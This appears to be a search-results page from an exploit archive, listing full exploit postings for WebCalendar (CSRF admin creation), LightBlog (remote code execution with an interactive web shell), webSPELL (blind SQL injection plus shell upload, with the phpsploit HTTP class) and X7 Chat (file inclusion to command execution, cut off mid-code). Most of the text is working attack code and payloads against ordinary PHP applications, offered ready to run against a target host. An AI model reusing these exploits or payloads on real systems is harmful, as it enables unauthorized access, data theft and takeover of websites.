shell upload
Search result for 'shell upload'
(0.0796689987183 seconds)
KedAns-Dz/WebCalendar CVS 1.2 Cross Site Request Forgery ( na)
1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0 _ __ __ __ 1
1 /' \ __ /'__`\ /\ \__ /'__`\ 0
0 /\_, \ ___ /\_\/\_\ \ \ ___\ \ ,_\/\ \/\ \ _ ___ 1
1 \/_/\ \ /' _ `\ \/\ \/_/_\_<_ /'___\ \ \/\ \ \ \ \/\`'__\ 0
0 \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/ 1
1 \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\ 0
0 \/_/\/_/\/_/\ \_\ \/___/ \/____/ \/__/ \/___/ \/_/ 1
1 \ \____/ >> Exploit database separated by exploit 0
0 \/___/ type (local, remote, DoS, etc.) 1
1 1
0 [+] Site : 1337day.com 0
1 [+] Support e-mail : submit[at]1337day.com 1
0 0
1 ######################################### 1
0 I'm KedAns-Dz member from Inj3ct0r Team 1
1 ######################################### 0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1
###
# Title : WebCalendar CVS v1.2 Multiple (CSRF/XSRF) Vulnerabilities
# Author : KedAns-Dz
# E-mail : ked-h@hotmail.com (ked-h@1337day.com) | ked-h@exploit-id.com
# Home : Hassi.Messaoud (30008) - Algeria -(00213555248701)
# Web Site : www.1337day.com * www.exploit-id.com * www.dis9.com
# Twitter page : twitter.com/kedans | http://kedans.dis9.com
# platform : php
# Impact : Multiple (CSRF/XSRF)
# Tested on : Windows XP SP3 (Fr)
##
# [Indoushka] => Welcome back Br0ther <3 ^^
##
# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |
# + All Dz .. This is Open Group 4 L33T Dz Hax3rZ ..
###
# Download : [http://www.k5n.us/files/webcalendar-cvs.tar.gz]
# (+) Exploit :
#==(1)==[ Add New User ]====>
<form action="http://site/edit_user_handler.php" name="edituser" method="post">
<input type="hidden" name="formtype" value="edituser" />
<input type="text" name="ufirstname" id="ufirstname" size="20" value="Ked" />
<input type="text" name="ulastname" id="ulastname" size="20" value="Ans" />
<input type="text" name="uemail" id="uemail" size="20" value="ked-h@hotmail.com" />
<input name="upassword1" id="pass1" size="15" value="" type="password" />
<input name="upassword2" id="pass2" size="15" value="" type="password" />
<input type="hidden" name="uenabled" value="Y" />
<input type="hidden" name="uis_admin" value="Y" />
<input type="hidden" name="u_enabled" value="Y" />
<input type="submit" value="Save & Submit" />
#==(2)==[ Upload File via XSRF ]==>
<form action="docadd.php" method="post" name="docform" enctype="multipart/form-data">
<input type="hidden" name="id" value="<?php echo $id?>" />
<input type="hidden" name="type" value="A" />
<table>
<tr class="browse"><td>
<input type="file" name="FileName" id="fileupload" size="45" maxlength="50" />
<input type="text" name="description" size="30" maxlength="100" /></td></tr>
<td colspan="2">
<input type="submit" value="Upload & Submit" /></td></tr>
</table>
</form>
# (^_^) ! Good Luck ALL ...
# | >> -------+++=[ Dz Offenders Cr3w ]=+++----- << |
# | Indoushka * KedAns-Dz * Caddy-Dz * Kalashinkov3 |
# | Jago-dz * Over-X * Kha&miX * Ev!LsCr!pT_Dz * ...|
# | ----------------------------------------------- |
#================[ Exploited By KedAns-Dz * Inj3ct0r * ]=========================================
# Greets To : [D] HaCkerS-StreeT-Team [Z] < Algerians HaCkerS > + Rizky Ariestiyansyah * 1850 BBs
# + Greets To Inj3ct0r Operators Team : r0073r * Sid3^effectS * r4dc0re (www.1337day.com)
# Inj3ct0r Members 31337 : Indoushka * KnocKout * eXeSoul * eidelweiss * SeeMe * XroGuE * ZoRLu
# gunslinger_ * Sn!pEr.S!Te * anT!-Tr0J4n * ^Xecuti0N3r * Kalashinkov3 (www.1337day.com/team)
# Exploit-ID Team : jos_ali_joe + Caddy-Dz + kaMtiEz + r3m1ck (exploit-id.com) * Jago-dz * Over-X
# Kha&miX * Str0ke * JF * PaCketStorm Team (www.packetstormsecurity.org) * TreX (hotturks.org)
# www.metasploit.com * Underground Exploitation (www.dis9.com) * All Security and Exploits Webs ..
# -+-+-+-+-+-+-+-+-+-+-+-+={ Greetings to Friendly Teams : }=+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-
# (D) HaCkerS-StreeT-Team (Z) | Inj3ct0r | Exploit-ID | UE-Team | PaCket.Storm.Sec TM | Sec4Ever
# h4x0re-Sec | Dz-Ghost | INDONESIAN CODER | HotTurks | IndiShell | D.N.A | DZ Team | Milw0rm
# Indian Cyber Army | MetaSploit | BaCk-TraCk | AutoSec.Tools | HighTech.Bridge SA | Team DoS-Dz
#================================================================================================
WebCalendar CVS version 1.2 suffers from multiple cross site request forgery vulnerabilities.
EgiX/LightBlog 9.9.2 Code Execution ( na)
<?
/*
---------------------------------------------------------------
LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit
---------------------------------------------------------------
author...: EgiX
mail.....: n0b0d13s[at]gmail[dot]com
link.....: http://www.publicwarehouse.co.uk/
demo.....: http://www.bailey-projects.com/projects/1/lightblog/
This PoC was written for educational purpose. Use it at your own risk.
Author will be not responsible for any damage.
[-] vulnerable code in /register.php
58. $username_towrite = stripslashes(htmlspecialchars($_POST['username_post'], ENT_QUOTES));
59. $password_towrite = stripslashes(md5(htmlspecialchars($_POST['pwd1_post'], ENT_QUOTES)));
60. $name_towrite = stripslashes(htmlspecialchars($_POST['name_post'], ENT_QUOTES));
61. $email_towrite = stripslashes(htmlspecialchars($_POST['email_post'], ENT_QUOTES));
62.
63. $newaccountfile = "./accounts/{$username_towrite}.php";
64.
65. $details = "<?php
66. \$password = \"{$password_towrite}\";
67. \$name = \"{$name_towrite}\";
68. \$email = \"{$email_towrite}\";
69. \$type = \"member\";
70. \$location = \"\";
71. \$aboutme = \"\";
72. \$website = \"\";
73. ?>";
74.
75. $fd = fopen ($newaccountfile, "w");
76. chmod($newaccountfile, 0777);
77. fwrite ($fd, $details);
78. fclose($fd);
An attacker could be able to inject and execute arbitrary PHP code due to new accounts are saved
with "php" extension. This is possible because input is not properly sanitised, so you can use
"complex curly syntax", which allows to put complex expressions into string definitions.
[-] vulnerable code in /check_user.php
6. if(isset($_COOKIE['Lightblog_username']) and isset($_COOKIE['Lightblog_password'])){
7.
8. $username_cookie = $_COOKIE['Lightblog_username'];
9. $password_cookie = $_COOKIE['Lightblog_password'];
10.
11. if(file_exists("./accounts/{$username_cookie}.php")){
12.
13. include("./accounts/{$username_cookie}.php");
14.
15. if($password_cookie != $password){
16.
17. setcookie("Lightblog_password", "", time()-9999999);
18. setcookie("Lightblog_username", "", time()-9999999);
19. echo "<script>location.replace('login.php')</script>";
20. exit;
21.
22. } else {
23. $username = $username_cookie;
24. $user = true;
25. }
In addition to the LFI (line 13), an attacker could be able to bypass the authentication by
setting special crafted cookies. So anyone can access to cp_*.php and is able to to upload
arbitrary file or put malicious php code into e.g. settings.php. Arbitrary file upload poc:
POST /lightblog/cp_preview.php HTTP/1.0
Host: localhost
Cookie: Lightblog_password=; Lightblog_username=../header
Content-Length: 166
Content-Type: multipart/form-data; boundary=o0oOo0o
Connection: close
--o0oOo0o
Content-Disposition: form-data; name="image"; filename="poc.php"
<?php evil_code(); ?>
--o0oOo0o--
[-] Disclosure timeline:
[21/04/2009] - Bug discovered
[22/04/2009] - Vendor contacted but no response
[25/04/2009] - Vendor contacted again still no response
[26/04/2009] - Vendor has deleted any reference to LighBlog on his site (???)
[27/04/2009] - Public disclosure
*/
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout", 5);
function http_send($host, $packet)
{
if (($s = socket_create(AF_INET, SOCK_STREAM, SOL_TCP)) == false)
die("\nsocket_create(): " . socket_strerror($s) . "\n");
if (socket_connect($s, $host, 80) == false)
die("\nsocket_connect(): " . socket_strerror(socket_last_error()) . "\n");
socket_write($s, $packet, strlen($packet));
while ($m = socket_read($s, 2048)) $response .= $m;
socket_close($s);
return $response;
}
print "\n+-------------------------------------------------------------------------+";
print "\n| LightBlog <= 9.9.2 (register.php) Remote Code Execution Exploit by EgiX |";
print "\n+-------------------------------------------------------------------------+\n";
if ($argc < 3)
{
print "\nUsage......: php $argv[0] host path\n";
print "\nExample....: php $argv[0] localhost /";
print "\nExample....: php $argv[0] localhost /lightblog/\n\n";
die();
}
$host = $argv[1];
$path = $argv[2];
$code = rawurlencode('{${error_reporting(0)}}{${print(_code_)}}{${passthru(base64_decode($_SERVER[HTTP_CMD]))}}{${die}}');
$payload = "username_post=test&pwd1_post=test&pwd2_post=test&name_post=test&email_post={$code}";
$packet = "POST {$path}register.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n";
$packet .= $payload;
http_send($host, $packet);
$packet = "GET {$path} HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cookie: Lightblog_password=; Lightblog_username=test\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
while(1)
{
print "\nlightblog-shell# ";
if (($cmd = trim(fgets(STDIN))) == "exit") break;
$response = http_send($host, sprintf($packet, base64_encode($cmd)));
preg_match("/_code_/", $response) ? print array_pop(explode("_code_", $response)) : die("\n[-] Exploit failed\n");
}
?>
LightBlog versions 9.9.2 and below remote code execution exploit that leverages register.php.
DarkFig/webSPELL <= 4.01.02 Remote PHP Code Execution Exploit ( php)
#!/usr/bin/php
<?php
error_reporting(E_ALL ^ E_NOTICE);
# Admin id: 1
# Admin hash: 7b24afc8bc80e548d66c4e7ff72171c5
# Logged in (ws_auth=1%3A7b24afc8bc80e548d66c4e7ff72171c5)
# Trying to upload the malicious file
# Done (http://localhost/webspell4.01.02/downloads/c99shell.php)
#
if($argc < 5)
{
print ("
------ webSPELL <= 4.01.02 Remote PHP Code Execution Exploit ------
-----------------------------------------------------------------------
PHP conditions: register_globals=On
Credits: DarkFig <gmdarkfig@gmail.com>
URL: http://www.acid-root.new.fr/
-----------------------------------------------------------------------
Usage: $argv[0] -url <> -file <> [Options]
Params: -url For example http://victim.com/webspell/
-file The file you wanna upload (c99shell.php...)
Options: -prefix Table prefix (default=webs)
-upmatch The match which returns TRUE for the upload
-sqlmatch The match which returns TRUE for the SQL injection
-proxy If you wanna use a proxy <proxyhost:proxyport>
-proxyauth Basic authentification <proxyuser:proxypwd>
Example: $argv[0] -url http://localhost/webspell/ -file c99shell.php
-----------------------------------------------------------------------
");exit(1);
}
$url = getparam('url',1);
$file = getparam('file',1);
$prfix = (getparam('prefix')!='') ? getparam('prefix') : 'webs';
$match_upload = (getparam('upmatch')!='') ? getparam('upmatch') : '\;URL\=index\.php\?site\=files\&file\=';
$match_blindsql = (getparam('sqlmatch')!='') ? getparam('sqlmatch') : 'site\=profile\&id\=';
$proxy = getparam('proxy');
$authp = getparam('proxyauth');
$xpl = new phpsploit();
$xpl->agent("Mozilla Firefox");
if($proxy) $xpl->proxy($proxy);
if($authp) $xpl->proxyauth($authp);
print "\nAdmin id: ";
$userid = blind('userID');
print "\nAdmin hash: ";
$passwd = strtolower(blind('password'));
print "\nLogged in (ws_auth=$userid%3A$passwd)";
$xpl->addcookie("ws_auth",$userid."%3A".$passwd);
# File upload vulnerability
#
# +files.php
# |
# 42. $action = $_GET['action'];
# 43. if($action=="save") {
# 44. if(!isfileadmin($userID)) die(redirect("index.php?site=files", "no access!", "3"));
# 46. $upfile = $_FILES[upfile];
# 69. $filepath = "./downloads/";
# 71. $des_file = $filepath.$upfile[name];
# 72. if(!file_exists($des_file)) {
# 73. if(move_uploaded_file($upfile[tmp_name], $des_file)) {
#
print "\nTrying to upload the malicious file";
$frmdt = array(frmdt_url => $url.'index.php?site=files&action=save',
"fileurl" => 1,
"upfile" => array(frmdt_filename => basename($file),
frmdt_content => file_get_contents($file)));
$xpl->formdata($frmdt);
if(preg_match("#$match_upload#si",$xpl->getcontent())) print "\nDone";
else print "\nFailed";
print " (${url}downloads/".basename($file).")\n";
# Simple blind SQL injection (register_globals=On)
#
# +members.php
# |
# 31. if($_GET['action']=="show") {
# 32. if($_GET['squadID']) {
# 33. $getsquad = 'WHERE squadID="'.$_GET['squadID'].'"';
# 34. }
# 36. $ergebnis=safe_query("SELECT * FROM ".PREFIX."squads ".$getsquad." ORDER BY sort");
#
function blind($field)
{
global $prfix,$xpl,$url,$match_blindsql;
$d=0; $v='';
if(!eregi('p',$field)) { $b=47;$c=57; } # 0-9
else { $b=47;$c=70; } # 0-9a-z
while(TRUE)
{
$d++;
for($e=$b;$e<=$c;$e++)
{
if($e==47) $f='NULL';
else $f=$e;
$sql = "WHERE SUBSTR((SELECT $field FROM ${prfix}_user WHERE userID="
."(SELECT userID FROM ${prfix}_user_groups WHERE files=1 LIMIT 1)"
." LIMIT 1),$d,1)=CHAR($f)";
$xpl->get($url."index.php?site=members&action=show&getsquad=".urlencode($sql));
if(preg_match("#$match_blindsql#",$xpl->getcontent(),$matches))
{
if($e==47)
{
return $v;
}
else
{
print strtolower(chr($f));
$v .= chr($f);
break;
}
}
}
}
}
function getparam($param,$opt='')
{
global $argv;
foreach($argv as $value => $key)
{
if($key == '-'.$param) return $argv[$value+1];
}
if($opt) exit("\n-$param parameter required");
else return;
}
if(!function_exists('file_get_contents')) {
function file_get_contents($file)
{
$handle = fopen($file, "r");
$content = fread($fd, filesize($file));
fclose($handle);
return $content;
}
}
/*
*
* Copyright (C) darkfig
*
* This program is free software; you can redistribute it and/or
* modify it under the terms of the GNU General Public License
* as published by the Free Software Foundation; either version 2
* of the License, or (at your option) any later version.
*
* This program is distributed in the hope that it will be useful,
* but WITHOUT ANY WARRANTY; without even the implied warranty of
* MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
* GNU General Public License for more details.
*
* You should have received a copy of the GNU General Public License
* along with this program; if not, write to the Free Software
* Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA 02111-1307, USA.
*
* TITLE: PhpSploit Class
* REQUIREMENTS: PHP 5 (remove "private", "public" if you have PHP 4)
* VERSION: 1.2
* LICENSE: GNU General Public License
* ORIGINAL URL: http://www.acid-root.new.fr/tools/03061230.txt
* FILENAME: phpsploitclass.php
*
* CONTACT: gmdarkfig@gmail.com (french / english)
* GREETZ: Sparah, Ddx39
*
* DESCRIPTION:
* The phpsploit is a class implementing a web user agent.
* You can add cookies, headers, use a proxy server with (or without) a
* basic authentification. It supports the GET and the POST method. It can
* also be used like a browser with the cookiejar() function (which allow
* a server to add several cookies for the next requests) and the
* allowredirection() function (which allow the script to follow all
* redirections sent by the server). It can return the content (or the
* headers) of the request. Others useful functions can be used for debugging.
* A manual is actually in development but to know how to use it, you can
* read the comments.
*
* CHANGELOG:
* [2007-01-24] (1.2)
* * Bug #2 fixed: Problem concerning the getcookie() function ((|;))
* * New: multipart/form-data enctype is now supported
*
* [2006-12-31] (1.1)
* * Bug #1 fixed: Problem concerning the allowredirection() function (chr(13) bug)
* * New: You can now call the getheader() / getcontent() function without parameters
*
* [2006-12-30] (1.0)
* * First version
*
*/
class phpsploit {
/**
* This function is called by the get()/post() functions.
* You don't have to call it, this is the main function.
*
* @return $server_response
*/
private function sock()
{
if(!empty($this->proxyhost) && !empty($this->proxyport)) $socket = fsockopen($this->proxyhost,$this->proxyport);
else $socket = fsockopen($this->host,$this->port);
if(!$socket) die("Error: The host doesn't exist");
if($this->method==="get") $this->packet = "GET ".$this->url." HTTP/1.1\r\n";
elseif($this->method==="post" or $this->method==="formdata") $this->packet = "POST ".$this->url. " HTTP/1.1\r\n";
else die("Error: Invalid method");
if(!empty($this->proxyuser)) $this->packet .= "Proxy-Authorization: Basic ".base64_encode($this->proxyuser.":".$this->proxypass)."\r\n";
$this->packet .= "Host: ".$this->host."\r\n";
if(!empty($this->agent)) $this->packet .= "User-Agent: ".$this->agent."\r\n";
if(!empty($this->header)) $this->packet .= $this->header."\r\n";
if(!empty($this->cookie)) $this->packet .= "Cookie: ".$this->cookie."\r\n";
$this->packet .= "Connection: Close\r\n";
if($this->method==="post")
{
$this->packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data."\r\n";
}
elseif($this->method==="formdata")
{
$this->packet .= "Content-Type: multipart/form-data; boundary=---------------------------".$this->boundary."\r\n";
$this->packet .= "Content-Length: ".strlen($this->data)."\r\n\r\n";
$this->packet .= $this->data;
}
$this->packet .= "\r\n";
$this->recv = '';
fputs($socket,$this->packet);
while(!feof($socket)) $this->recv .= fgets($socket);
fclose($socket);
if($this->cookiejar) $this->cookiejar($this->getheader($this->recv));
if($this->allowredirection) return $this->allowredirection($this->recv);
else return $this->recv;
}
/**
* This function allows you to add several cookie in the
* request. Several methods are supported:
*
* $this->addcookie("name","value");
* or
* $this->addcookie("name=newvalue");
* or
* $this->addcookie("othername=overvalue; xx=zz; y=u");
*
* @param string $cookiename
* @param string $cookievalue
*
*/
public function addcookie($cookn,$cookv='')
{
// $this->addcookie("name","value"); work avec replace
if(!empty($cookv))
{
if($cookv === "deleted") $cookv=''; // cookiejar(1) && Set-Cookie: name=delete
if(!empty($this->cookie))
{
if(preg_match("/$cookn=/",$this->cookie))
{
$this->cookie = preg_replace("/$cookn=(\S*);/","$cookn=$cookv;",$this->cookie);
}
else
{
$this->cookie .= " ".$cookn."=".$cookv.";"; // " ".
}
}
else
{
$this->cookie = $cookn."=".$cookv.";";
}
}
// $this->addcookie("name=value; othername=othervalue");
else
{
if(!empty($this->cookie))
{
$cookn = preg_replace("/(.*);$/","$1",$cookn);
$cookarr = explode(";",str_replace(" ", "",$cookn));
for($i=0;$i<count($cookarr);$i++)
{
preg_match("/(\S*)=(\S*)/",$cookarr[$i],$matches);
$cookn = $matches[1];
$cookv = $matches[2];
$this->addcookie($cookn,$cookv);
}
}
else
{
$cookn = ((substr($cookn,(strlen($cookn)-1),1))===";") ? $cookn : $cookn.";";
$this->cookie = $cookn;
}
}
}
/**
* This function allows you to add several headers in the
* request. Several methods are supported:
*
* $this->addheader("headername","headervalue");
* or
* $this->addheader("headername: headervalue");
*
* @param string $headername
* @param string $headervalue
*/
public function addheader($headern,$headervalue='')
{
// $this->addheader("name","value");
if(!empty($headervalue))
{
if(!empty($this->header))
{
if(preg_match("/$headern:/",$this->header))
{
$this->header = preg_replace("/$headern: (\S*)/","$headern: $headervalue",$this->header);
}
else
{
$this->header .= "\r\n".$headern.": ".$headervalue;
}
}
else
{
$this->header=$headern.": ".$headervalue;
}
}
// $this->addheader("name: value");
else
{
if(!empty($this->header))
{
$headarr = explode(": ",$headern);
$headern = $headarr[0];
$headerv = $headarr[1];
$this->addheader($headern,$headerv);
}
else
{
$this->header=$headern;
}
}
}
/**
* This function allows you to use an http proxy server.
* Several methods are supported:
*
* $this->proxy("proxyip","8118");
* or
* $this->proxy("proxyip:8118")
*
* @param string $proxyhost
* @param integer $proxyport
*/
public function proxy($proxy,$proxyp='')
{
// $this->proxy("localhost:8118");
if(empty($proxyp))
{
preg_match("/^(\S*):(\d+)$/",$proxy,$proxarr);
$proxh = $proxarr[1];
$proxp = $proxarr[2];
$this->proxyhost=$proxh;
$this->proxyport=$proxp;
}
// $this->proxy("localhost",8118);
else
{
$this->proxyhost=$proxy;
$this->proxyport=intval($proxyp);
}
if($this->proxyport > 65535) die("Error: Invalid port number");
}
/**
* This function allows you to use an http proxy server
* which requires a basic authentification. Several
* methods are supported:
*
* $this->proxyauth("darkfig","dapasswd");
* or
* $this->proxyauth("darkfig:dapasswd");
*
* @param string $proxyuser
* @param string $proxypass
*/
public function proxyauth($proxyauth,$proxypasse='')
{
// $this->proxyauth("darkfig:password");
if(empty($proxypasse))
{
preg_match("/^(.*):(.*)$/",$proxyauth,$proxautharr);
$proxu = $proxautharr[1];
$proxp = $proxautharr[2];
$this->proxyuser=$proxu;
$this->proxypass=$proxp;
}
// $this->proxyauth("darkfig","password");
else
{
$this->proxyuser=$proxyauth;
$this->proxypass=$proxypasse;
}
}
/**
* This function allows you to set the "User-Agent" header.
* Several methods are possible to do that:
*
* $this->agent("Mozilla Firefox");
* or
* $this->addheader("User-Agent: Mozilla Firefox");
* or
* $this->addheader("User-Agent","Mozilla Firefox");
*
* @param string $useragent
*/
public function agent($useragent)
{
$this->agent=$useragent;
}
/**
* This function returns the header which will be
* in the next request.
*
* $this->showheader();
*
* @return $header
*/
public function showheader()
{
return $this->header;
}
/**
* This function returns the cookie which will be
* in the next request.
*
* $this->showcookie();
*
* @return $storedcookies
*/
public function showcookie()
{
return $this->cookie;
}
/**
* This function returns the last formed
* http request (the http packet).
*
* $this->showlastrequest();
*
* @return $last_http_request
*/
public function showlastrequest()
{
return $this->packet;
}
/**
* This function sends the formed http packet with the
* GET method. You can precise the port of the host.
*
* $this->get("http://localhost");
* $this->get("http://localhost:888/xd/tst.php");
*
* @param string $urlwithpath
* @return $server_response
*/
public function get($url)
{
$this->target($url);
$this->method="get";
return $this->sock();
}
/**
* This function sends the formed http packet with the
* POST method. You can precise the port of the host.
*
* $this->post("http://localhost/index.php","admin=1&user=dark");
*
* @param string $urlwithpath
* @param string $postdata
* @return $server_response
*/
public function post($url,$data)
{
$this->target($url);
$this->method="post";
$this->data=$data;
return $this->sock();
}
/**
* This function sends the formed http packet with the
* POST method using the multipart/form-data enctype.
*
* $array = array(
* frmdt_url => "http://localhost/upload.php",
* frmdt_boundary => "123456", # Optional
* "email" => "me@u.com",
* "varname" => array(
* frmdt_type => "image/gif", # Optional
* frmdt_transfert => "binary", # Optional
* frmdt_filename => "hello.php",
* frmdt_content => "<?php echo ':)'; ?>"));
* $this->formdata($array);
*
* @param array $array
* @return $server_response
*/
public function formdata($array)
{
$this->target($array[frmdt_url]);
$this->method="formdata";
$this->data='';
if(!isset($array[frmdt_boundary])) $this->boundary="phpsploit";
else $this->boundary=$array[frmdt_boundary];
foreach($array as $key => $value)
{
if(!preg_match("#^frmdt_(boundary|url)#",$key))
{
$this->data .= "-----------------------------".$this->boundary."\r\n";
$this->data .= "Content-Disposition: form-data; name=\"".$key."\";";
if(!is_array($value))
{
$this->data .= "\r\n\r\n".$value."\r\n";
}
else
{
$this->data .= " filename=\"".$array[$key][frmdt_filename]."\";\r\n";
if(isset($array[$key][frmdt_type])) $this->data .= "Content-Type: ".$array[$key][frmdt_type]."\r\n";
if(isset($array[$key][frmdt_transfert])) $this->data .= "Content-Transfer-Encoding: ".$array[$key][frmdt_transfert]."\r\n";
$this->data .= "\r\n".$array[$key][frmdt_content]."\r\n";
}
}
}
$this->data .= "-----------------------------".$this->boundary."--\r\n";
return $this->sock();
}
/**
* This function returns the content of the server response
* without the headers.
*
* $this->getcontent($this->get("http://localhost/"));
* or
* $this->getcontent();
*
* @param string $server_response
* @return $onlythecontent
*/
public function getcontent($code='')
{
if(empty($code)) $code = $this->recv;
$content = explode("\n",$code);
$onlycode = '';
for($i=1;$i<count($content);$i++)
{
if(!preg_match("/^(\S*):/",$content[$i])) $ok = 1;
if($ok) $onlycode .= $content[$i]."\n";
}
return $onlycode;
}
/**
* This function returns the headers of the server response
* without the content.
*
* $this->getheader($this->post("http://localhost/x.php","x=1&z=2"));
* or
* $this->getheader();
*
* @param string $server_response
* @return $onlytheheaders
*/
public function getheader($code='')
{
if(empty($code)) $code = $this->recv;
$header = explode("\n",$code);
$onlyheader = $header[0]."\n";
for($i=1;$i<count($header);$i++)
{
if(!preg_match("/^(\S*):/",$header[$i])) break;
$onlyheader .= $header[$i]."\n";
}
return $onlyheader;
}
/**
* This function is called by the cookiejar() function.
* It adds the value of the "Set-Cookie" header in the "Cookie"
* header for the next request. You don't have to call it.
*
* @param string $server_response
*/
private function getcookie($code)
{
$carr = explode("\n",str_replace("\r\n","\n",$code));
for($z=0;$z<count($carr);$z++)
{
if(preg_match("/set-cookie: (.*)/i",$carr[$z],$cookarr))
{
$cookie[] = preg_replace("/expires=(.*)(GMT||UTC)(\S*)$/i","",preg_replace("/path=(.*)/i","",$cookarr[1]));
}
}
for($i=0;$i<count($cookie);$i++)
{
preg_match("/(\S*)=(\S*)(|;)/",$cookie[$i],$matches);
$cookn = $matches[1];
$cookv = $matches[2];
$this->addcookie($cookn,$cookv);
}
}
/**
* This function is called by the get()/post() functions.
* You don't have to call it.
*
* @param string $urltarg
*/
private function target($urltarg)
{
if(!preg_match("/^http:\/\/(.*)\//",$urltarg)) $urltarg .= "/";
$this->url=$urltarg;
$array = explode("/",str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg)));
$this->host=$array[0];
preg_match("/:(\d+)\//",$urltarg,$matches);
$this->port=empty($matches[1]) ? 80 : $matches[1];
$temp = str_replace("http://","",preg_replace("/:(\d+)/","",$urltarg));
preg_match("/\/(.*)\//",$temp,$matches);
$this->path=str_replace("//","/","/".$matches[1]."/");
if($this->port > 65535) die("Error: Invalid port number");
}
/**
* If you call this function, the script will
* extract all "Set-Cookie" headers values
* and it will automatically add them into the "Cookie" header
* for all next requests.
*
* $this->cookiejar(1); // enabled
* $this->cookiejar(0); // disabled
*
*/
public function cookiejar($code)
{
if($code===0) $this->cookiejar='';
if($code===1) $this->cookiejar=1;
else
{
$this->getcookie($code);
}
}
/**
* If you call this function, the script will
* follow all redirections sent by the server.
*
* $this->allowredirection(1); // enabled
* $this->allowredirection(0); // disabled
*
* @return $this->get($locationresponse)
*/
public function allowredirection($code)
{
if($code===0) $this->allowredirection='';
if($code===1) $this->allowredirection=1;
else
{
if(preg_match("/(location|content-location|uri): (.*)/i",$code,$codearr))
{
$location = str_replace(chr(13),'',$codearr[2]);
if(!eregi("://",$location))
{
return $this->get("http://".$this->host.$this->path.$location);
}
else
{
return $this->get($location);
}
}
else
{
return $code;
}
}
}
/**
* This function allows you to reset some parameters:
*
* $this->reset(header); // headers cleaned
* $this->reset(cookie); // cookies cleaned
* $this->reset(); // clean all parameters
*
* @param string $func
*/
public function reset($func='')
{
switch($func)
{
case "header":
$this->header='';
break;
case "cookie":
$this->cookie='';
break;
default:
$this->cookiejar='';
$this->header='';
$this->cookie='';
$this->allowredirection='';
$this->agent='';
break;
}
}
}
?>
# milw0rm.com [2007-03-03]
rgod/X7 Chat <= 2.0 (help_file) Remote Commands Execution Exploit ( php)
#!/usr/bin/php -q -d short_open_tag=on
<?
echo "X7 Chat <=2.0 \"help_file\" arbitrary local inclusion\r\n";
echo "by rgod rgod@autistici.org\r\n";
echo "site: http://retrogod.altervista.org\r\n";
echo "-> works regardless of magic_quotes_gpc settings\r\n";
echo " if avatar uploads are enabled (default)\r\n";
echo "dork: intitle:\"X7 Chat Help Center\" | \"Powered By X7 Chat\"\r\n\r\n";
if ($argc<4) {
echo "Usage: php ".$argv[0]." host path cmd OPTIONS\r\n";
echo "host: target server (ip/hostname)\r\n";
echo "path: path to X7\r\n";
echo "cmd: a shell command\r\n";
echo "Options:\r\n";
echo " -p[port]: specify a port other than 80\r\n";
echo " -P[ip:port]: specify a proxy\r\n";
echo "Examples:\r\n";
echo "php ".$argv[0]." localhost /X7/ cat ./../config.php\r\n";
echo "php ".$argv[0]." localhost /X7/ ls -la -p81\r\n";
echo "php ".$argv[0]." localhost / ls -la -P1.1.1.1:80\r\n";
die;
}
/*
software site: http://www.x7chat.com/
description: "X7 Chat is free, open source, software written in PHP"
vulnerable code in help/index.php at lines 32-37:
...
if(!isset($_GET['help_file']) || !@is_file("./{$_GET['help_file']}")){
$_GET['help_file'] = "main";
}
// Load the help definitions
include("./{$_GET['help_file']}");
...
so, you can view/include all files on target system, poc:
http://[target]/[path]/help/index.php?help_file=../../../../../../etc/passwd
this tool upload an avatar with php code as EXIF metadata content, then:
http://[target]/[path]/help/index.php?help_file=../uploads/avatar_[username].jpeg&cmd=ls%20-la
*/
error_reporting(0);
ini_set("max_execution_time",0);
ini_set("default_socket_timeout",5);
function quick_dump($string)
{
$result='';$exa='';$cont=0;
for ($i=0; $i<=strlen($string)-1; $i++)
{
if ((ord($string[$i]) <= 32 ) | (ord($string[$i]) > 126 ))
{$result.=" .";}
else
{$result.=" ".$string[$i];}
if (strlen(dechex(ord($string[$i])))==2)
{$exa.=" ".dechex(ord($string[$i]));}
else
{$exa.=" 0".dechex(ord($string[$i]));}
$cont++;if ($cont==15) {$cont=0; $result.="\r\n"; $exa.="\r\n";}
}
return $exa."\r\n".$result;
}
$proxy_regex = '(\b\d{1,3}\.\d{1,3}\.\d{1,3}\.\d{1,3}\:\d{1,5}\b)';
function sendpacketii($packet)
{
global $proxy, $host, $port, $html, $proxy_regex;
if ($proxy=='') {
$ock=fsockopen(gethostbyname($host),$port);
if (!$ock) {
echo 'No response from '.$host.':'.$port; die;
}
}
else {
$c = preg_match($proxy_regex,$proxy);
if (!$c) {
echo 'Not a valid proxy...';die;
}
$parts=explode(':',$proxy);
echo "Connecting to ".$parts[0].":".$parts[1]." proxy...\r\n";
$ock=fsockopen($parts[0],$parts[1]);
if (!$ock) {
echo 'No response from proxy...';die;
}
}
fputs($ock,$packet);
if ($proxy=='') {
$html='';
while (!feof($ock)) {
$html.=fgets($ock);
}
}
else {
$html='';
while ((!feof($ock)) or (!eregi(chr(0x0d).chr(0x0a).chr(0x0d).chr(0x0a),$html))) {
$html.=fread($ock,1);
}
}
fclose($ock);
#debug
